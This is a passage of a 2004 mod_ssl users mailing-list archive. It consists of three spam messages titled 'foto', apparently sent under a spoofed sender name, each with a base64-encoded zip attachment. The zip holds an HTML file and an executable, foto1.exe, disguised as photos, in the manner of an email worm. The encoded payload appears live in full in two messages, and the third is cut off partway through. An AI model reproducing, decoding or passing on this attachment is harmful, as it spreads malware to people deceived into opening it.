Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------jsoujmyehbebriaatmmm
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------jsoujmyehbebriaatmmm--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:02:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DCF44A8D1D; Tue, 31 Aug 2004 22:02:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from MARLON.org (200165172113.user.veloxzone.com.br [200.165.172.113])
	by master.modssl.org (Postfix) with SMTP id BCEB4A8D08
	for ; Tue, 31 Aug 2004 22:01:58 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:59:11 -0300
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------qirzbmwbrfwmtmzuvytx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------qirzbmwbrfwmtmzuvytx
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------qirzbmwbrfwmtmzuvytx
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------qirzbmwbrfwmtmzuvytx--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:05:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9B1F2A8963; Tue, 31 Aug 2004 22:05:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from jmanzanares.org (fw-torre.telemovil.net [200.85.0.50])
	by master.modssl.org (Postfix) with SMTP id 94D7CA8934
	for ; Tue, 31 Aug 2004 22:05:40 +0200 (CEST)
Date: Tue, 31 Aug 2004 14:09:56 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------nonsrvbfhawyomuhwaze"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------nonsrvbfhawyomuhwaze
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------nonsrvbfhawyomuhwaze
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
